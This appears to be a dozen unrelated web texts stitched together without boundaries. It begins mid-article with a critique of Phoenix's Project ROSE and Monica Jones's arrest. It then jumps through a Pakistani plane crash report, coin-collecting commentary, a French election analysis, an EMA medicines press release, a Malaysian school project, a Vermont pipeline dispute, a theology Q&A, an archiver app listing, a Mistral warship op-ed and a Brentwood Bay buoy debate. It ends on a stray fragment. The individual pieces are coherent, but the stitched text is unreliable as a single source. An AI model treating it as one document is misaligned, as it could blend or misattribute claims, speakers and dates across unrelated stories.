Furthermore, the director of Project ROSE, Dr. Dominique Roe-Sepowitz, has interacted with Jones previously. Roe-Sepowitz is a professor at ASU, where Jones is a student; Roe-Sepowitz and Jones have even debated each other on the subject of Project ROSE. Jones' longtime position as an active and engaged critic of Project ROSE calls the program's stated aims into question: is it in fact a “rescue” operation? If so, who is it saving?
The program's claim to help the alleged sex workers it (doesn't technically) arrest seems flawed when one considers the options it offers them. (“Alleged,” because “manifesting prostitution” can, in practice, mean virtually anything, including striking up a conversation with a stranger.) If a sex worker takes the option to be “rescued” — to attend 36 hours of “diversion” programming — they're offered no way to compensate for the critical income they may be losing during that time, and no childcare. No food is offered in the daily classes, which last from 8-4. No condoms are provided — ROSE is a religious program with Catholic values, attempting to address issues of sex work without contraceptives — and no concrete information or strategies are provided on engaging in sex work more safely, let alone how to leave sex work if that's what's desired. And for at least some of the sex workers, leaving the industry isn't what they want — Jones included. She told VICE that “I wasn't ashamed about being a sex worker. I kept bringing this up during the diversion program… Girls would ask me why I didn't feel this way. Well, 'cause I don't. I have the right to my own body.”
Jones further addressed the problems with the diversion program after a protest against it with the Sex Worker Outreach Project of Phoenix:
“I took the diversion program and it was like the worst experience ever. It was humiliating. They treat you as like just a thing. Like [because] you're a prostitute, this is what's wrong with you. This is what you need to be doing. And like for me, I 'm proud to be a sex worker. I'm not on drugs. I'm not like one of these crazy people. I just needed to make money for school. And for a transworker they housed me in the men's facility. And I was humiliated there. I was harassed by the DRCs there. I was harassed by the inmates there. And I was in isolation there full time for 15 days in a cell by myself. And I did nothing wrong. I was in there with murderers, child molesters and like rapists. So I was in there with a whole bunch of the worst people you can think of.”
In contrast, johns who are identified within the program are asked only to attend “a John School where men arrested for buying sex have to undergo 6 hours of “schooling” regarding the nature of prostitution and they harm they cause the women as part of their sentencing.” Johns are required to spend only a sixth of the time being “educated” that sex workers are. Project ROSE doesn't appear to have any programs or services aimed at pimps. It also doesn't appear to make any differentiation between people trafficked into the sex trade against their will, and consenting adults who have entered the sex trade freely. Jordan Flaherty, a journalist who traveled to Phoenix to write about SWOP-Phoenix and Project ROSE, found that “…the police lieutenant that helped found it said basically he feels that everyone's being trafficked, and the social worker that founded it also has a similar perspective. They really conflate the trafficking and sex work.”
If a sex worker doesn't choose to attend the programming, or doesn't qualify — because they have drugs on their person, or because they have prior prostitution arrests — they face jail time in a state with a prison system so harsh it's made headlines nationwide. Recently and tragically, we learned of the death of Marcia Powell, who was serving two years for a prostitution conviction when she died because she was left in an outdoor cage in scorching sun for hours. The prison-industrial system is integral to Project ROSE's model of sex workers and their rescue — one that, as Flaherty reports, “just [doesn't] see an alternative outside of the criminal justice system and they think the only thing they can do is to work within the criminal justice system. …they're continually seeing all of these women—and it is 98% women who go through the program—all of these women as victims, but at the same time as criminals.” On top of the already inhumane Arizona prison system, Jones will have to navigate it as a black trans woman. Incarcerated trans women generally face horrific levels of violence from both inmates and guards, sexual assault, and severely limited access to medical care. Right now, the state of Arizona wants Jones to be held in a men's prison, which is extraordinarily dangerous for her.
The question, then, remains: who is being rescued here? In what way would any of these choices provide real support or positive change? How does Jones — or any sex worker — benefit from her arrest and subsequent incarceration?
Jones' arrest and conviction raise deeply troubling questions about how our governing bodies conceive of sex work and sex workers, as well as the value placed on trans women of color and trans women's bodies. Given that Jones wasn't engaged in any kind of sex work when she was arrested, is our legal system interested in punishing the act of engaging in sex work, or is it interested in punishing people who have ever engaged in sex work just for having done so? Given that Jones is being incarcerated for speaking out against a system that claimed to want to help her — for explaining that it does not in fact help, and that anyone who wants to help her should pursue other measures — how are we to interpret the program's goals? Do its actions indicate that it's interested in supporting trans sex workers of color, or that it's interested in the social and political capital to be gained from purporting to rescue them? Which narrative does Project ROSE and other programs like it stand to benefit from more: the one in which Monica Jones is a strong and talented student, activist, volunteer in her community, and sex worker; or the one in which Monica Jones is a helpless victim of a trade that she isn't capable of fully understanding or navigating her way out of? Jones' incarceration through the program would seem to provide some clues.
SWOP-Phoenix is leading a pledge to defund Project ROSE and support Monica Jones; donations can be sent directly to Monica via Paypal at freedom.for.monica@gmail.com.
next Image 1 of 3
prev next Image 2 of 3
prev Image 3 of 3
Emergency workers with flashlights searched the smoldering wreckage of a passenger jet carrying 127 people that crashed into a muddy wheat field Friday while trying to land in a violent thunderstorm at Islamabad's main airport.
The government said there appeared to be no survivors in the crash of the Boeing 737-200 near Benazir Bhutto International Airport -- the second major air disaster in the Pakistani capital in less than two years.
Sobbing relatives of those aboard the Bhoja Air flight from Karachi to Islamabad rushed to airports in both cities for news of their loved ones.
One rescue official asked residents to bring sheets to cover the remains of the dead, and smashed seats and other wreckage was spread over a wide area near the airport, along with clothing and jewelry belonging to passengers.
Bhoja Air, a domestic carrier that has just four planes, only resumed operations last month after suspending them in 2001 due to financial difficulties.
More On This...
Bhoja administrative director Javed Ishaq told reporters and relatives of those on board that the jet was in good condition and was brought down by "heavy winds."
"The aircraft was in good shape. This came from God," said Ishaq, speaking at the airport in Karachi, Pakistan's largest city. As he spoke, relatives of those aboard who had come to the airport jeered him and demanded to be flown to Islamabad to collect the bodies of their loved ones.
The plane had been given clearance to land, said an air traffic controller who did not give his name because he was not authorized to speak to the media. A violent thunderstorm was lashing Islamabad at the time of the crash, about 6:40 p.m. local time.
"It was really bad weather for a flight," said navy Capt. Arshad Mahmood, who lives near the crash site. "The pilot was forced to move down to avoid clouds that were generating the lightning and thunder."
Islamabad police chief Bani Yameen said nobody on the ground was reported killed, "but apparently all on board perished." Civil aviation officials also said survivors were highly unlikely, according to Defense Minister Chaudhry Ahmed Mukhtar.
"My brother's wife was on board this flight," said Naveed Khan. "We pray for the departed souls. What else can we do now?"
TV footage showed wreckage that included parts of what looked like an engine and a wing against the wall of a small building. Rescuers worked in the dark, with many using flashlights as they combed the area. Fleets of ambulances arrived later, their lights flashing in the gloom.
Several farmers threshing wheat in the field nearby said they saw the aircraft burst into flames when it hit the ground.
"The flames leapt up like they were touching the sky," said Mohammad Zubair.
The army declared an emergency and cordoned off the crash site.
"I saw nothing but body parts and twisted metal on the ground when I reached the scene," said resident named Mustafa, who did not identify himself further.
He said residents collected the remains of the dead "and bundled them in cloth sheets like we collect grain."
In a statement, the Boeing Co. extended its condolences to the families of the victims and offered technical assistance to Pakistan's Civil Aviation Authority in investigating the crash.
The last major plane crash in the country -- and Pakistan's worst -- occurred in July 2010 when an Airbus A321 aircraft operated by domestic carrier Airblue crashed into the hills overlooking Islamabad, killing all 152 people aboard. A government investigation blamed the pilot for veering off course amid stormy weather.
Bhoja Air started domestic operations in Pakistan in 1993 and eventually expanded to international flights to the United Arab Emirates in 1998. The company suspended operations in 2001 due to financial difficulties but resumed them in 2012.
Ron Guth
The 1909-S VDB ranks as one of the most popular and widely known of all the Lincoln cents and some might argue that it is one of the favorites in the entire run of United States coins. Collectors love coins with stories, and this one has a couple.
First, there's the controversy over the initials on the reverse. When Victor David Brenner created his new design, he placed his full name in tiny letters on the base of the reverse, bottom center. This was nothing new, as other designers and engravers had placed their names and/or initials on coins of the past. As part of modifications to Brenner's models, Mint Engraver Charles Barber changed the name to the artist's three initials (VDB). Once the coins were issued, some newspaper reporters took issue with the placement of the initials, arguing that the bottom of the reverse was far from inconspicuous and that the initials amounted to free, illegal advertising for the designer. Instead of placing the initials elsewhere in new dies, mint employees simply removed them entirely from the coin, and a new round of cents were produced without the VDB.
The short period of time in which the VDB coins were produced in San Francisco led to the second desirable attribute of this coin: it's low mintage. Only 484,000 Cents were issued with the VDB initials, creating an instant scarcity. It's popularity has remained high ever since.
The 1909-S VDB Cent ranked 14th in the second edition of "100 Greatest U.S. Coins" by Jeff Garrett and Ron Guth, reflecting the immense popularity of this date.
David Hall
A lot has been written about this famous penny and all I can add is two stories that illustrate how deeply ingrained this issue is in the collective consciousness of the coin collecting community. This may be the most well known U.S. coin. The first story is from a presentation I recently gave at a PCGS "members" coin show. I was discussing the "future of the coin market" and the audience was about 40 people. I started the presentation by asking the audience, "How many here have been buying/collecting coins for more than 5 years? 10 years? 20 years?" Then I asked if there was anyone who was an absolute newcomer to the coin market and two people raised their hands. Later in the presentation I was telling stories about how some coins were more popular than others. I asked, "What is the most well known U.S. coin?" and I pointed to one of the gentlemen who had earlier indicated he was a complete newcomer to coin collecting and he answered, "That penny, that 1909-S VDB penny."
The second story involves my son. A few years ago, as a 12 year old, my son was collecting Lincoln cents. We'd go to the Saturday bid board at the local coin shop and he'd go to the Long Beach coin show and buy a few coins. He was buying circulated coins and trying to get one of every date. He would always look at 1909-S VDBs, but he couldn't afford one. One day he made the following statement, "Dad, I'd eat worms for an S VDB." That about says it all, doesn't it.
Mass abstention overshadows Macron victory in French legislative elections
By Alex Lantier
12 June 2017
A historic level of abstention dominated the first round of the French legislative elections yesterday, which gave newly-elected President Emmanuel Macron's party The Republic On the March (LREM) a large majority. But fully 51.2 percent of voters abstained—the first time since the end of World War II that only a minority of registered voters participated in the legislative elections.
Workers and youth overwhelmingly stayed away from the polls. Although 70 percent of retirees voted in the elections, approximately 30 percent of voters aged under thirty went to vote. Opinion polls carried out in the days before the elections showed that 56 percent of the so-called “popular categories,” comprising manual workers and employees, planned to abstain.
This is a resoundingly negative judgment of the French population on the media campaign to promote Macron's counter-revolutionary program proposing to create a permanent state of emergency, slashing attacks on labor protections, and a return to the draft.
It appears that the legislative elections—whose purpose was to determine, as Le Monde wrote, whether Macron will have “unchecked powers” to impose his program—will produce an overwhelming LREM majority in the Assembly. However, even if the electoral mechanisms grant Macron an unchallenged hold over the legislature, this majority—elected by only a minority of the population—will have no legitimacy to impose his program.
LREM obtained 32 percent of the vote, against 21 percent for the right-wing The Republicans (LR), 13.9 percent for the neo-fascist National Front, 10.9 percent for the Unsubmissive France (UF) of Jean-Luc Mélenchon, 13.3 percent for the Socialist Party (PS), and 3.3 percent for the Stalinist French Communist Party (PCF). The candidates of Lutte ouvrière (LO, Workers Struggle) and the New Anti-capitalist Party (NPA) together obtained only 0.08 percent of the vote.
Nonetheless, given the electoral set-up—one needs to obtain a number of votes greater than 12.5 percent of the registered voters to advance to the second round, which is carried simply by whoever gets the most votes—LREM can hope to obtain a lopsided majority in the Assembly.
Though it only obtained the votes of 16 percent of registered voters, LREM may have, according to initial projections based on yesterday's vote, a crushing majority of 400 to 450 seats in the 577-seat National Assembly. LR would have 70 to 110 seats, the PS 20 to 30, a UF-PCF coalition 8 to 18, and the FN 7 to 12.
Initial analyses of LREM's vote point to its very heterogeneous and therefore fragile character. In Paris, LREM's vague promises of reform and modernization allowed it to carry both the very bourgeois 16th district, and the working-class neighborhoods of the 19th district.
Numerous politicians and media commentators openly worried that the abstention meant that Macron's lack of democratic legitimacy will have serious political consequences when he sets out to enforce his agenda on the population.
“Our democracy cannot allow itself to be sick,” declared PS First Secretary Jean-Christophe Cambadélis, who added: “It is neither healthy nor desirable for a president who obtained only 24 percent of the vote on the first round and won the second round purely on the basis of popular rejection of the National Front, to have a monopoly of democratic representation.”
Last night, France Info commented: “It's a black mark, even a very black mark: the future National Assembly will give an image that is only a political caricature of France. And this is not a sign of good health in a democracy.”
The Macron government was reduced to appealing to voters to participate in greater numbers in the second round of the legislative elections this coming Sunday. “You were less numerous to vote” than in the presidential elections, declared Prime Minister Edouard Philippe, who added that he felt obliged to “insist on the necessity that voters go vote next Sunday.”
These elections are marked by a crying contradiction. There is broad opposition to the program of austerity, military mobilization, and police-state rule that Macron has developed in collaboration with Berlin and the European Union (EU). However, LREM—founded last year by Macron, then the economy minister in the despised PS government of then-President François Hollande—has been able to establish itself over a few months as France's main bourgeois party, winning over large factions of the PS and LR.
This is bound up above all with the treacherous role of Mélenchon and UF, as well as the NPA and LO, in providing tacit support to Macron, though it was perfectly clear that Macron would intensify the sharp shift to the right carried out under Hollande. When Macron and Le Pen made it to the second round, both Mélenchon and the NPA—without openly endorsing Macron—made clear that they tacitly supported a Macron victory.
The NPA stated that it “understood” anyone who voted for Macron against Le Pen, and Mélenchon then subsequently offered to serve as Macron's prime minister and to advise Macron's ministers on legislation they were trying to pass in the National Assembly.
They rejected the political line advanced by the Parti de l'égalité socialiste (PES), the French section of the International Committee of the Fourth International. The PES rejected false claims that Macron was a defender of democracy against Le Pen and called for an active boycott of the second round of the presidential elections. It explained that it was seeking to arm the working class with a politically independent perspective to fight the onslaught that would inevitably be launched against the workers, whether it was Macron or Le Pen who won the presidency.
The total abdication of Mélenchon and the NPA of all responsibility to offer a perspective to oppose Macron is in line with the historic collapse of the parties that made up what has passed for the French “left” for nearly a half-century—since the last major revolutionary experience of the working class in France, the May-June 1968 general strike.
The PS was the leading party since shortly after its foundation in 1971. It won a 331-seat majority in the Assembly after the 2012 elections, but after Hollande's presidency, it is now set to be reduced to an impotent rump. It is paying the price for having carried out unpopular policies of imperialist war and social austerity every time it took power. Large sections of its personnel are seeking to recycle themselves politically by joining LREM.
Many other high-ranking PS and Green legislators have been eliminated, however: Cambadélis, PS presidential candidate Benoît Hamon, former PS Interior Minister Matthias Fekl, former PS Justice Minister Elizabeth Guigou, and former Green Party leader Cécile Duflot.
The PCF's sclerotic bureaucracy, which collapsed after forming a long-term alliance with the PS in the 1970s and above all after the Stalinist bureaucracy's dissolution of the USSR in 1991, will have only 20 candidates present in the second round of the legislative elections. It is threatened with the loss of its status as a parliamentary group, which requires having at least 15 seats, and thus a loss of financial resources that could prove devastating, or even fatal.
To the extent that these forces blocked the politically independent mobilization of the working class against Macron, this has allowed him to establish a dominant position over other branches of government and prepare deep attacks against the workers. Macron will, nonetheless, face explosive opposition in the working class, under conditions where mass abstention has deprived the Assembly of any semblance of legitimacy to impose his reactionary program.
Please enable JavaScript to view the comments powered by Disqus.
New scheme supports European Commission priorities
The European Medicines Agency (EMA) launches today its new PRIME (PRIority MEdicines) scheme to strengthen support to medicines that target an unmet medical need. The scheme focuses on medicines that may offer a major therapeutic advantage over existing treatments, or benefit patients with no treatment options. These medicines are considered priority medicines within the European Union (EU).
Through PRIME, EMA offers early, proactive and enhanced support to medicine developers to optimise the generation of robust data on a medicine's benefits and risks and enable accelerated assessment of medicine applications. This will help patients to benefit as early as possible from therapies that may significantly improve their quality of life.
By engaging with medicine developers early, PRIME aims to strengthen clinical trial designs to facilitate the generation of high quality data for the evaluation of an application for marketing authorisation. Early dialogue and scientific advice also ensure that patients participate in trials that are likely to provide the necessary data for an application for marketing authorisation, and help to make the best use of limited resources.
“The launch of PRIME is a major step forward for patients and their families that have long been hoping for earlier access to safe treatments for their unmet medical needs, such as rare cancers, Alzheimer's disease and other dementias,” says Vytenis Andriukaitis, EU Commissioner for Health and Food Safety. “Through enhanced scientific support this scheme could also help, for example, to accelerate the development and authorisation of new classes of antibiotics or their alternatives in an era of increasing antimicrobial resistance.” The Commissioner also highlights that PRIME optimises the use of the current regulatory framework that can contribute to the European Commission's priorities in terms of boosting innovation, jobs, growth and competitiveness.
“Our goal is to foster better planning of medicine development to help companies generate the high quality data we need to assess quality, safety and efficacy of medicines,” explains Professor Guido Rasi, EMA's Executive Director. “Patients with no or insufficient treatments could then benefit from scientific progress and cutting edge medicines as soon as possible.”
PRIME builds on the existing regulatory framework and available tools such as scientific advice and accelerated assessment. This means that a PRIME medicine is expected to benefit from accelerated assessment at the time of an application for marketing authorisation.
“We want to ensure that breakthroughs in medicines reach patients quicker,” says Dr Tomas Salmonson, Chair of the Committee for Medicinal Products for Human Use (CHMP). “By strengthening collaboration between the scientific committees, and by gaining and sharing knowledge on the medicine throughout the development, we will not only accelerate patients' access but also ensure an efficient use of available resources.”
To be accepted for PRIME, a medicine has to show its potential to benefit patients with unmet medical needs based on early clinical data. Once a candidate medicine has been selected for PRIME, the Agency:
appoints a rapporteur from EMA's CHMP or from the Committee on Advanced Therapies (CAT) in the case of an advanced therapy, to provide continuous support and help to build knowledge ahead of a marketing authorisation application;
organises a kick-off meeting with the CHMP/CAT rapporteur and a multidisciplinary group of experts from relevant EMA scientific committees and working parties, and provides guidance on the overall development plan and regulatory strategy;
assigns a dedicated EMA contact point;
provides scientific advice at key development milestones, involving additional stakeholders such as health technology assessment bodies to facilitate patients' quicker access to the new medicine;
confirms potential for accelerated assessment at the time of an application for marketing authorisation.
While PRIME is open to all companies on the basis of preliminary clinical evidence, micro-, small- and medium-sized enterprises (SMEs) and applicants from the academic sector can apply earlier on the basis of compelling non-clinical data and tolerability data from initial clinical trials. They may also request fee waivers for scientific advice. Since SMEs and academia often lack experience with the regulatory framework, they can benefit in particular from earlier scientific and regulatory advice.
Strengthened regulatory toolkit for medicines addressing unmet needs
EMA has released guidance documents on PRIME as well as a comprehensive overview of the EU early access regulatory tools, i.e. accelerated assessment, conditional marketing authorisation and compassionate use. Revised guidelines on the implementation of accelerated assessment and conditional marketing authorisation are also published today. All these tools are reserved for medicines addressing major public health needs. The revised guidelines provide more detailed information based on past experience. They encourage early dialogue between the various stakeholders which is crucial to optimise use of these tools. Although PRIME is specifically designed to promote accelerated assessment, it will also help to make the best use of other EU early access tools and initiatives, which can be combined whenever a medicine fulfils the respective criteria.
PRIME was developed in consultation with the Agency's scientific committees, the European Commission and its expert group on Safe and Timely Access to Medicines for Patients (STAMP) as well as the European medicines regulatory network. This network of national competent authorities and its many experts who conduct the scientific evaluations is key to the success of the new scheme.
The main principles of PRIME were released for a two-month public consultation in 2015 and the comments received were taken into account in the final version.
PUTRAJAYA: A pilot project to inculcate the clean toilet culture in schools will take off next month, says education deputy director-general (Education Operation Sector) Ahmad Tajuddin Jab.
He said several schools had been selected for the project before it could be implemented in schools nationwide, as practised in developed countries, such as Japan.
However, for the project to be implemented, he added the education ministry needed the support of parents to encourage the culture at home.
So far, we have only organised clean toilet competitions but these were mainly one-offs.
“What is more important is to continuously generate awareness on the importance of a clean toilet environment, educating children on hygenic toilet habits and ways of keeping toilets clean,” Tajuddin told reporters after presenting the 2016 national-level awards to schools which had successfully enlivened their surau here yesterday.
Last August, Education Minister Mahdzir Khalid had said that this year, the ministry would introduce sharing the responsibility of cleaning and maintenance of school toilets as a national agenda.
Commenting on the natural resources and environment ministry's proposal that enviromental study be introduced in schools, Tajuddin said environmental aspects had been incorporated in several subjects that were referred to as cross-curricular topics.
He said for 21st century education, learning would revolve around financial management, health education and environmental protection that would be incorporated in school subjects and extra-curricular activities.
“However, the ministry will look into how this can be applied in a more organised manner,” he added.
Tajuddin said on Feb 8, the education ministry had also held discussions with the natural resources and environment ministry on developing a syllabus related to environmental science and this would be fine-tuned by a joint technical committee.
By
By Morgan True for Vermont Digger
The attorney for a family who settled with Vermont Gas Systems to avoid having its land taken by eminent domain says the utility violated that agreement last week by starting construction-related activities without giving proper notice.
James Dumont represents a number of people with property on the Addison Rutland Natural Gas Project pipeline route. His clients Terence and Kari Cuneo reached a settlement to sell their Williston property to Vermont Gas earlier this year.
The deal allowed the family to stay in their home, but contained a notification provision that was supposed to give them time to leave and stay elsewhere while construction is completed. The agreement also allows them to return after construction while they search for a new home.
The occupancy agreement says the Cuneos would be given 48 hours' notice of any preconstruction work, which is defined in the agreement as “surveying, rock-probing, geotechnical boring, tree clearing, staking for (right of way) delineation, and other activities to prepare for construction.”
It also states that notice would be required for the use of any heavy vehicles “greater than the mass of a standard pickup truck” and that notice was to be provided by phone call and email to them and their attorney.
No construction was supposed to happen before Saturday, according to the agreement. The agreement was intended to ensure the safety of the family, because one of the Cuneos' children walks to school across the pipeline route, Dumont said.
That's why it came as an unwelcome surprise Thursday when a bulldozer and excavator were brought onto the property, digging out and flattening the pipeline route and leaving earth piled to one side, according to Dumont.
To read the full story, click here.
HB reader Keith asks,
Succinctly, what is covenant theology on the following: Predestination Security of the believer?
Hi Keith,
The short answer is that the covenant theology that we confess does not fundamentally change our doctrine of predestination, which says that all those whom God has elected, in Christ (Eph 1:1–15), from all eternity will be saved and cannot be lost (John 10:28). Our covenant theology accounts for the administration of that eternal, immutable decree. God has chosen to execute his decree to elect through the visible church. The Holy Spirit uses the preaching of the gospel to bring his elect to new life and true faith.
All those who are in the visible church are external or outward members of the covenant of grace but only those who are elected, whom God brings to new life and true faith become internal or inward members of the covenant of grace. Only they, by grace alone, through faith alone apprehend Christ. All those who do apprehend Christ by true faith shall never be lost and can never be lost.
There are always within the visible covenant community (the visible church) two kinds of people: the elect and the reprobate. The latter may pretend to believe (e.g., Mark 7:6) but they are those, as Hebrews 6:4–5 says, who have been “once been enlightened, who have tasted the heavenly gift, and have shared in the Holy Spirit, and have tasted the goodness of the word of God and the powers of the age to come…”. These, Hebrews 10:29 says, have “profaned the blood of the covenant” and “outraged the Spirit of grace.” These God has decreed to pass by, to leave in their unbelief.
There are those (e.g., the so-called “Federal Visionists”) who teach two kinds of election, a real one and a temporary one, which they call “covenantal.” This is nothing more than Arminianism dressed up as covenant theology but it is not the covenant theology of Scripture nor the covenant theology that we confess (e.g., in the Belgic Confession or the Westminster Standards), nor the covenant theology of the Reformed tradition.
The gospel is that Jesus accomplished the complete salvation of all of his people—”It is finished!—and all his people will, by his grace and preservation, in union and communion with Christ, persevere to the end and they do that in the visible covenant community established by Christ and using the keys of the kingdom (Matt 16:19) i.e., the means of grace that he gave us.
RESOURCES
Out with the old, in with the new. The powerful archiver 8 Zips has expanded its set of capabilities with the new Continuum, Cortana and Windows Hello technologies. Now one app, one license, a uniform design and functionality can be had on all types of devices. Decrypt files through an iris scan or at a touch. Listen to music, read documents, and watch videos right in the app. Share files with friends – it's simple. 8 Zips is a cutting-edge archiver. Distinctive features: • High-speed archiving and unpacking. • Incorporation of Continuum technology. • Ability to decrypt archives using Windows Hello. • Play music and video, display images and text files directly in the app. • Send files by e-mail, post them on social networks, or share them on OneDrive and DropBox. • Select the compression level and password protection. • Print documents and images. • One purchase gives you a license that is valid for all of your Windows 10 device. 8 Zips knows over 25 languages. The app has been downloaded more than 3,000,000 times Thank you for helping to make 8 Zips better! Simply send your suggestions for improvement to 8zip@finebits.com and show your support by giving us a ★★★★★ review. To purchase a corporate version of the program, please contact us by e-mail: sales@finebits.com Technical specifications: • Create archives: zip, 7z, tar, gzip, bzip2, xz. • Open and extract archives: rar, zip, 7z, zipx, iso, bzip2, gzip, tar, arj, cab, cbz, cbr. • Built-in viewer and player. • View images: jpeg, png, bmp, gif, tiff. • Play music: mp3, wma, flac, m4a, aac, wav, ac3. • Watch video: avi, 3gp, wmv, mp4, m4v, mov, mkv. • Open and view text documents: docx, doc, rtf, txt. • Support for the latest archive formats: RAR5 and 7z. • Various compression methods: Deflate, Deflate64, BZip, LZMA, PPMd. • Create password-protected archives: 256-bit AES encryption. • Ability to open encrypted files through Windows Hello and Microsoft Passport technology. • Support for decompressing multivolume archives: zip, rar, 7z. • Support for Drag&Drop technology. • Support for SD cards. Release notes: 06/26/2018 • Ability to Extract with the application from the Windows Explorer's context menu. 12/08/2017 • 7-Zip library was updated to version 16.04. 05/09/2017 • Creators Update support. • Extended Share contract feature, now you can easily: - send files from archive to the clipboard; - unpack compressed file simple by sending it to 8 Zips from any other app including Explorer; - unpack several archives at once; - compress files with Share from another app including Explorer; • Implemented auto update if you modified compressed document in external application. • Added option to turn on app window transparency (aka NEON). • Added compact overlay mode for image/audio/video viewer (aka Picture in picture). • Added equalizer to audio player. 04/14/2017 • The restoring of original time of files and folders during extraction was added. 10/21/2016 • Xbox One support. • Comic Book Archive support (.cbz, .cbr) • UI improvements. • New languages: Albanian, Croatian, Estonian, Finnish, Hungarian, Serbian, Swedish. 6/18/2016 • Improved ability to select items in list for pen and mouse. Now you can do it using selection rectangle. 6/10/2016 • Integration with Cortana 04/16/2016 • Basic support of multitasking was added: packing and unpacking of small archives can be performed if app was minimized. • Progress bar is shown when archive is opening. 03/18/2016 8 Zips has become a completely universal UWP app and now works on any Windows 10 device: PC, laptop, tablet, smartphone, Xbox One, Hololens, IoT devices. Support has been added for Continuum, Windows Hello, and Microsoft Passport technologies. 12/20/2014 8 Zips is Universal app from now. RAR5 support added. Recent archives list. New languages: Arabic, Belarusian, Bulgarian, Vietnamese, Greek, Indonesian, Dutch, Polish, Portuguese (Brazil), Romanian, Slovenian, Turkish, Ukrainian, Farsi, Hindi, Czech, Japanese. 09/13/2013 Advanced compression options Built-in viewer 05/16/2013 In app Language selection Translation fixes 05/05/2013 Slight interface improvements A lot of bug fixes New live tiles
Today, in a shipyard in northwest France, two warships are receiving finishing touches. These ships are more than twice the length of a football field. They each can carry 700 troops, 60 armored vehicles, four landing craft, and 16 helicopters. They represent the state of the art in amphibious assault vessels. And when these two Mistral-class ships leave port in France, they'll sail to Russia where they will enhance the military strength of a nation that forcibly annexed Crimea and is posing increasing challenges to Ukraine and countries across Eastern Europe.
With a newly aggressive Russia, the United States and our allies should look for a way to keep these ships out of Vladimir Putin's hands so we don't give him precisely the type of expeditionary military asset used to invade other nations. While there was a time following the end of the Cold War when Russia acted more cooperatively and could be a partner in European stability, that period has clearly reached an end. It is critical that NATO countries no longer provide powerful weapons to enhance Russia's ability to intimidate or even invade its neighbors, and even if the Ukrainian crisis continues to cool, we cannot send the message that we're back to “business as usual” with Russia.
The French government has signaled a willingness to postpone a final decision on the sale of the ships until this fall. That's good news. But canceling this contract would mean a big financial hit for our French allies: the ships reportedly cost $1.6 billion and their construction employs hundreds of workers. So the United States and our partners and allies need to work toward a solution before France faces the impossible choice of selling Russia the ships or swallowing huge losses.
That's why last month I wrote to NATO Secretary General Anders Fogh Rasmussen, urging a plan by which the alliance would collectively purchase or lease the warships as a common naval asset.
This avenue would give us a win-win-win solution.
First, we deprive Putin of this valuable military asset. Such a step would help reassure nervous allies and partners in Central and Eastern Europe that would most feel vulnerable by this force multiplier in the hands of the Russian military.
Second, we would greatly enhance NATO capabilities at a moment when many of its members have been cutting defense expenditures. There is already ample precedent for NATO to purchase shared assets, including the alliance's fleet of E-3A AWACS aircraft. If Russia does indeed remain an aggressive force, NATO will have to refocus its energy and resources on European defense. The future success of the alliance in turn will depend on all NATO members sharing this burden and commitment. Purchasing these ships would give NATO a much-needed shot in the arm.
Lastly, this purchase wouldn't leave France holding the bill. At a time when the European economy remains fragile, we shouldn't allow one of our allies to endure such a heavy financial blow.
Secretary General Rasmussen will soon visit Washington, where I'll reiterate my suggestion for the way we deal with these ships. In the meantime, I hope leaders and thinkers in the global arena will take a hard look at the threat posed by Russia and consider what it would mean if our allies continue to strengthen Putin's ability to wage war.
Eliot Engel is a member of the US House of Representatives for the 16th District of New York and the ranking minority member of the House Committee on Foreign Affairs.
A marathon Committee of a Whole meeting on Monday has left some Brentwood Bay boaters concerned about their future.
The bulk of the meeting, which lasted three hours and 45 minutes, was spent discussing the Brentwood Bay Management Plan: a complex, multi-phase plan which would make the District of Central Saanich responsible for monitoring Brentwood Bay. Currently, that responsibility is split between the province and the federal government. But if passed, the District would apply for a “licence of occupation” from the province giving them jurisdiction. As part of the plan, the District wants to limit the amount of buoys in the bay (the District proposes 40 privately owned buoys to start), ensure that buoys are clear of navigation channels and ensure that existing liveaboard vessels have insurance and holding tanks for sewage.
Two groups supported the draft management plan. Rick Schurr of the British Columbia Nautical Residents Association praised the District for their treatment of liveaboard residents and their willingness to work with them on “mundane issues” like garbage collection, comparing it favourably to the Village of Queen Charlotte, which he said is “kicking all the liveaboards out” now that it is winter. Michael Simmons, vice-chair of the Saanich Inlet Protection Society, echoed Schnurr's praise of the advisory committee, saying that Ruth Malli ran community consultations in “an exemplary way” welcoming participants even if they came in midway through the process, getting them “up to speed.”
However, resident after resident came to the mic to express some degree of opposition to the plan. According to the draft plan, boaters would be asked to pay $1,000 annually for existing buoys, which staff acknowledged “could be difficult for some people to come up with,” so there would be quarterly payments of $100 per month paid in advance.
One liveaboard resident said that a legal mooring certified by Transport Canada costs almost $3,000 to install, which they installed in good faith. He objected to a part of the plan which he said would have the District “seize almost $300,000 worth of private property,” considering there are around 100 buoys in the area.
Miles Mana, a consultant hired by the District on this issue, said staff estimated that 35 liveaboard vessels were in the area, so while that would not leave many extra buoys, no liveaboard residents would be evicted if they were given priority as specified in the plan. He also said that if a boater's buoy passed an inspection and met the District's safety requirements, then it could stay. If it were in a navigation channel, there would be a cost to move the buoy, but it would not be confiscated.
Boater Chris Allen felt that the current amount of buoys posed no navigational problems for him, saying that if someone had difficulty navigating the area they should “get [their] certificate renewed.”
Another resident said that Brentwood Bay was an affordable place to have boat, because “marinas aren't priced for locals, I can tell you that.” The new plan, he said, would make it unaffordable.
Councillor Niall Paltiel pointed out development is not unfettered on land, so he was generally supportive of the plan. Coun. Zeb King was concerned the scope of the initiative had grown too large. He said there was consensus around derelict boats and sewage, which he felt should not be mixed in with the issue of housing on the water. Coun. Christopher Graham acknowledged that “the costs are definitely a big jump from what people are used to” but it was still low in comparison to other options like a marina. Graham said “we are probably moving in the right direction” but that he had not fully settled on the issue.
Coun. Bob Thompson noted the plan “isn't written in stone,” and there was still an opportunity to amend the details, though it would inevitably delay implementation.
The motion to begin securing a Licence of Occupation and notify residents passed, with Councillors Alicia Holman and King in opposition.
In a follow-up interview, Mayor Ryan Windsor compared the marine situation to that on land, where there are fees and regulations as to the placement of terrestrial homes. Windsor was “kind of disappointed” in the way the plan was characterized, because he felt the District had done sufficient work trying to notify affected residents.
John Evans, who lives on a vessel in the bay, remains against the proposal. After Monday's meeting, he submitted a letter to Council which he forwarded to the News Review. Among other grievances, he felt residents were not notified in a timely manner (“Word of mouth reached us in late November this year!”), that the licence of occupation was “primarily conceived and to be rushed through council by a small group of wealthy landowners,” and that boaters are unfairly maligned for polluting the bay. Instead of this licence of occupation, he proposed that the boaters themselves be responsible for monitoring the bay, asking for Coast Guard help where necessary to remove derelict vessels.
The District is continuing to accept feedback online through its PlaceSpeak tool.
6 It's Hard To Tell If It's Supposed To Be Sexual
A-Force Entertainment
